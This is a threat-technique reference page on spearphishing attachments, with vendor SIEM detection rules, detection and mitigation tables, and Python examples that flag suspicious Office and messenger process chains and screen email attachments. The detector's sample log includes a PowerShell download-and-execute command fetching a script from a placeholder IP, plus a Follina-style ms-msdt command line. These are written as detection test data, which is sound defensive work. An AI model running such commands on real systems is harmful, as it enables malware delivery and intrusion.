T1566.001: Spearphishing Attachment
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a variant of spearphishing that differs from the other forms in that the malware is delivered as a file attached to the email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment, such as Microsoft Office documents, executables, PDFs, or archives. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually gives a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as the password of a zip file, so that the payload passes through email boundary defenses unscanned. Adversaries frequently manipulate file extensions and icons to make attached executables appear to be document files, or to make a file exploiting one application appear to belong to a different one.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
mitre_attck_execution: PT-CR-345: Malicious_Office_Document: A suspicious sequence of process startup by a Microsoft Office application is detected
mitre_attck_execution: PT-CR-605: Office_File_with_Macros: A user opened a Microsoft Office document with a macro
mitre_attck_execution: PT-CR-648: Suspicious_Child_from_Messenger_Process: A user started a process from a parent messenger process
vulnerabilities: PT-CR-1375: Windows_Contacts_RCE: Possible exploitation of vulnerability CVE-2022-44666 in Windows Contacts
vulnerabilities: PT-CR-779: MSDT_CVE_2022_30190: The ms-msdt protocol was used to exploit vulnerability CVE-2022-30190 (Follina) in Microsoft Support Diagnostic Tool (MSDT)
vulnerabilities: PT-CR-892: Possible_CVE_2021_1647: Possible exploitation of vulnerability CVE-2021-1647 in Windows Defender
antimalware: PT-CR-722: Sandbox_Full_Scan_Malware: PT Sandbox is triggered by an analysis session result
antimalware: PT-CR-723: Subrule_Sandbox_File_Verdict: PT Sandbox is triggered by a file during an analysis session
antimalware: PT-CR-726: Sandbox_Spam_Attack_By_Attachment: Spam delivery with the same attachment is detected
antimalware: PT-CR-727: Sandbox_Spam_Attack_By_Source: Spam delivery from the same sender is detected
antimalware: PT-CR-728: Sandbox_Spam_Attack_By_Title: Spam delivery with the same subject is detected
antimalware: PT-CR-729: Subrule_Sandbox_Mail_Attachment: A PT Sandbox event is supplemented with attachment information
antimalware: PT-CR-745: Subrule_Sandbox_Mail_IP: A PT Sandbox event is supplemented with IP address information
process_chains_and_logons: PT-CR-950: Suspicious_Office_Process_Chain: Suspicious process start chain for Microsoft Office or Adobe Acrobat applications
mitre_attck_initial_access: PT-CR-2301: Suspicious_File_Creation_From_Messenger_or_Mail: A file with a suspicious extension was created by an instant messenger or email program, or malicious file activity was detected. This may indicate a phishing attack or malware being delivered to the user's computer.
mitre_attck_initial_access: PT-CR-2416: Open_Password_Protected_File: A user opened an encrypted ZIP archive using a native OS tool and launched a file
mitre_attck_initial_access: PT-CR-2447: WMI_Execution_via_VBA_Macro: A process was created using a Windows Management Instrumentation command from a Microsoft Office document macro
process_chains_and_logons: PT-CR-1213: Suspicious_Messenger_Process_Chain: Suspicious process start chain for instant messenger programs
antimalware: PT-CR-1770: Subrule_Sandbox_Count_Mail_Attachments: A PT Sandbox event is supplemented with attachment count information
antimalware: PT-CR-2080: KSMG_Malware_Detect_And_Clean: A malicious object is found in an email and cured
antimalware: PT-CR-2084: KSMG_Encrypted_Message_Detected: An encrypted file object is found in an email
antimalware: PT-CR-2085: KSMG_Malware_remove: A malicious object is found and deleted from an email
Detection
| ID | Data source and component | Description |
|---|---|---|
| DS0029 | Network Traffic: Network Traffic Content | Monitor and analyze SSL/TLS traffic patterns and inspect packets for protocols that do not follow the expected standards and flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlating with process monitoring and command-line logging to detect anomalous process execution and command-line arguments associated with these traffic patterns (e.g. anomalies in the use of files that do not normally initiate connections for the respective protocol). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. |
| DS0015 | Application Log: Application Log Content | Monitor third-party application logging, messaging, and other artifacts that may indicate spearphishing emails with a malicious attachment sent in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Antivirus can potentially detect malicious documents and attachments as they are scanned for storage on the email server or on the user's computer. Monitor for suspicious descendant processes spawned from Microsoft Office and other productivity software. |
| DS0029 | Network Traffic: Network Traffic Flow | Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. |
| DS0022 | File: File Creation | Monitor for newly created files that originate from spearphishing emails with a malicious attachment sent in an attempt to gain access to victim systems. |
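The process-chain detections described in the rule list and the Application Log row above (Office or Acrobat spawning a script host, the ms-msdt protocol handler, a messenger or mail client starting a binary from a user-writable path, a renamed executable) can be checked with a few lines of logic. The following is an added example written for this page; it is neither MaxPatrol SIEM rule content nor MITRE text. It runs over constructed Sysmon-style process-creation events (Event ID 1 field names Image, ParentImage, CommandLine, OriginalFileName, UtcTime) serialised as JSON lines, which is an assumed export format; the application and path lists are assumptions to tune per environment.

```python
import json
import ntpath

# Applications that render untrusted attachments or messages (the parents watched by the
# Office/Acrobat and messenger process-chain rules listed above). These lists are assumptions.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe", "acrobat.exe"}
MESSAGING_APPS = {"outlook.exe", "thunderbird.exe", "telegram.exe", "discord.exe", "slack.exe"}
# Interpreters, shells and LOLBins that a document or chat client has no business starting.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "wmic.exe", "msdt.exe", "bitsadmin.exe"}
# Path fragments a user (or a dropper running as the user) can write to.
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")

def classify(event):
    """Return the alert names that fire for one Sysmon-style process-creation event."""
    image = event["Image"].lower()
    name = ntpath.basename(image)
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmdline = event.get("CommandLine", "").lower()
    original = event.get("OriginalFileName", "").lower()   # name from the PE version resource
    in_user_path = any(p in image for p in USER_WRITABLE)
    alerts = []
    if parent in DOCUMENT_APPS and name in SCRIPT_HOSTS:
        alerts.append("office_spawns_script_host")
    if "ms-msdt:" in cmdline:                               # Follina-style protocol handler abuse
        alerts.append("msdt_protocol_invoked")
    if parent in DOCUMENT_APPS and in_user_path:
        alerts.append("office_spawns_user_writable_binary")
    if parent in MESSAGING_APPS and (name in SCRIPT_HOSTS or in_user_path):
        alerts.append("messenger_spawns_untrusted_binary")
    # A binary whose embedded name differs from its file name has been renamed (icon/extension
    # disguise). On its own this is noisy, so raise it only under a document or messenger parent.
    if original and original != name and parent in DOCUMENT_APPS | MESSAGING_APPS:
        alerts.append("renamed_executable")
    return alerts

def scan(log_text):
    """Parse JSON-lines events; return (UtcTime, image basename, alerts) for each event that fires."""
    hits = []
    for line in filter(None, log_text.strip().splitlines()):
        event = json.loads(line)
        alerts = classify(event)
        if alerts:
            hits.append((event["UtcTime"], ntpath.basename(event["Image"]), alerts))
    return hits

# Constructed sample: five process-creation events, three malicious and two benign (the benign
# ones show that ordinary Office activity, e.g. the print-spooler helper, does not fire).
SAMPLE_LOG = r"""
{"UtcTime": "2024-03-11 09:14:02", "Image": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\"", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
{"UtcTime": "2024-03-11 09:16:40", "Image": "C:\\Windows\\System32\\msdt.exe", "OriginalFileName": "msdt.exe", "CommandLine": "\"C:\\Windows\\System32\\msdt.exe\" ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu\"", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
{"UtcTime": "2024-03-11 09:20:11", "Image": "C:\\Users\\alice\\Downloads\\Invoice_2024.pdf.exe", "OriginalFileName": "Loader.exe", "CommandLine": "\"C:\\Users\\alice\\Downloads\\Invoice_2024.pdf.exe\"", "ParentImage": "C:\\Users\\alice\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe"}
{"UtcTime": "2024-03-11 09:21:05", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "OriginalFileName": "WinWord.exe", "CommandLine": "\"WINWORD.EXE\" /n Q3_report.docx", "ParentImage": "C:\\Windows\\explorer.exe"}
{"UtcTime": "2024-03-11 09:22:30", "Image": "C:\\Windows\\splwow64.exe", "OriginalFileName": "splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
"""

if __name__ == "__main__":
    for when, image, alerts in scan(SAMPLE_LOG):
        print(when, image, ", ".join(alerts))
```

Running it prints one line per firing event; the two benign events (Word started from Explorer, and the print-spooler helper started by Word) stay silent. A macro that launches its payload through WMI (the case PT-CR-2447 above covers) breaks the parent chain, because the child is created by WmiPrvSE.exe rather than by the Office process, so a parent-child rule like this one misses it and has to be correlated with the preceding Office activity instead.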
Mitigation
| ID | Name | Description |
|---|---|---|
| M1049 | Antivirus/Antimalware | Antivirus can automatically quarantine suspicious files. |
| M1031 | Network Intrusion Prevention | Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. |
| M1054 | Software Configuration | Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross-domain) to perform similar message filtering and validation. |
| M1017 | User Training | Users can be trained to identify social engineering techniques and spearphishing emails. |
| M1021 | Restrict Web-Based Content | Block by default unknown or unused attachment types that should not be transmitted over email, such as .scr, .exe, .pif, .cpl, etc., as a best practice to prevent some vectors. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar, that may be used to conceal malicious attachments. |
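The Software Configuration and Restrict Web-Based Content mitigations above, together with the password-protected archive trick described in the technique text, can be combined into a single gateway decision. The following is an added example, not Positive Technologies or MITRE material: it parses a raw message with Python's standard email module, makes a DMARC-style decision from the Authentication-Results header the gateway itself stamped (SPF or DKIM pass plus alignment with the From: domain), rejects attachments with blocked or deceptive double extensions, and treats an encrypted ZIP (general-purpose flag bit 0 set) as unscannable. The sample message, the extension lists and the verdict policy are constructed for the example; the alignment test is a subdomain approximation of DMARC relaxed alignment.

```python
import email
import email.utils
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Extensions that should not arrive by email: the M1021 examples plus common script and
# disk-image droppers. The list is an assumption for this example; tune it per organisation.
BLOCKED_EXT = {".exe", ".scr", ".pif", ".cpl", ".com", ".bat", ".cmd", ".js", ".jse", ".vbs",
               ".vbe", ".wsf", ".hta", ".lnk", ".msi", ".iso", ".img", ".ps1"}
# Extensions an attacker puts before the real one so an executable looks like a document.
DECOY_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
RTLO = "\u202e"  # right-to-left override: "Invoice_\u202efdp.exe" renders as "Invoice_exe.pdf"

def filename_findings(name):
    """Reasons one attachment (or archive member) filename is suspicious."""
    parts = name.lower().rsplit(".", 2)          # keep up to two trailing extensions
    last = "." + parts[-1] if len(parts) > 1 else ""
    findings = ["blocked_extension"] if last in BLOCKED_EXT else []
    if len(parts) == 3 and "." + parts[1] in DECOY_EXT and last in BLOCKED_EXT:
        findings.append("double_extension")
    if RTLO in name:
        findings.append("rtlo_in_filename")
    return findings

def archive_findings(blob):
    """Flag ZIPs a scanner cannot open (encrypted members); otherwise check member names."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return ["unreadable_archive"]
    findings = []
    for info in zf.infolist():
        if info.flag_bits & 0x1:                 # general-purpose bit 0: member is encrypted
            return ["encrypted_archive"]
        findings += [f"member {info.filename}: {f}" for f in filename_findings(info.filename)]
    return findings

def sender_authenticated(msg):
    """DMARC-style check on the gateway's own Authentication-Results header: SPF or DKIM must
    pass AND the authenticated domain must align with the visible From: domain."""
    from_domain = email.utils.parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    results = " ".join(msg.get_all("Authentication-Results", [])).lower()
    outcome = dict(re.findall(r"\b(spf|dkim)=(\w+)", results))
    mailfrom = re.search(r"smtp\.mailfrom=([^\s;]+)", results)
    dkim_d = re.search(r"header\.d=([^\s;]+)", results)
    def aligned(d):                              # subdomain test approximates relaxed alignment
        return bool(d) and (d == from_domain or d.endswith("." + from_domain)
                            or from_domain.endswith("." + d))
    spf_ok = outcome.get("spf") == "pass" and mailfrom and aligned(mailfrom.group(1).rpartition("@")[2])
    dkim_ok = outcome.get("dkim") == "pass" and dkim_d and aligned(dkim_d.group(1))
    return bool(spf_ok or dkim_ok)

def gateway_verdict(raw):
    """Return (verdict, findings) for one raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = [] if sender_authenticated(msg) else ["sender_not_authenticated"]
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        hits = filename_findings(name)
        if name.lower().endswith(".zip"):
            hits += archive_findings(part.get_payload(decode=True))
        findings += [f"{name}: {h}" for h in hits]
    if any(not f.startswith("sender_") for f in findings):
        return "block", findings                 # dangerous attachment: never deliver
    return ("quarantine" if findings else "deliver"), findings

def make_zip(members, encrypted=False):
    """Constructed test data; 'encrypted' sets flag bit 0 in the local and central headers,
    which is what a password-protected archive looks like to a scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    blob = bytearray(buf.getvalue())
    if encrypted:
        blob[6] |= 1                             # local file header flags
        blob[blob.find(b"PK\x01\x02") + 8] |= 1  # central directory flags
    return bytes(blob)

def build_message(from_addr, auth_results, attachments):
    """Constructed sample mail, as the gateway sees it after stamping Authentication-Results."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = from_addr, "finance@corp.example", "Overdue invoice"
    msg["Authentication-Results"] = auth_results
    msg.set_content("Please see the attached invoice. The archive password is 1234.")
    for name, data in attachments:
        msg.add_attachment(data, maintype="application", subtype="octet-stream", filename=name)
    return msg.as_bytes()

# Constructed sample: a spoofed From (SPF passes only for an unrelated bounce domain), a
# disguised executable, a password-protected archive and an archive that hides a .lnk.
SAMPLE_PHISH = build_message(
    "Accounts <accounts@vendor.example>",
    "mx.corp.example; spf=pass smtp.mailfrom=bounce@mailer-x.example; dkim=none",
    [("Invoice_2024.pdf.exe", b"MZ\x90\x00" + b"\x00" * 60),
     ("Scan.zip", make_zip({"Scan.exe": b"MZ"}, encrypted=True)),
     ("Report.zip", make_zip({"readme.txt": b"hi", "Report.lnk": b"L\x00\x00\x00"}))])

if __name__ == "__main__":
    print(*gateway_verdict(SAMPLE_PHISH))
```

Inspecting the ZIP headers rather than attempting extraction is what lets the gateway distinguish "cannot scan" from "clean": an encrypted archive cannot be opened for content inspection, so a password supplied in the message body is a quarantine signal, not a reason to deliver. A production DMARC evaluation must also honour the sender domain's published policy (p=none, quarantine or reject) and compute alignment on the organisational domain rather than with the subdomain test used here.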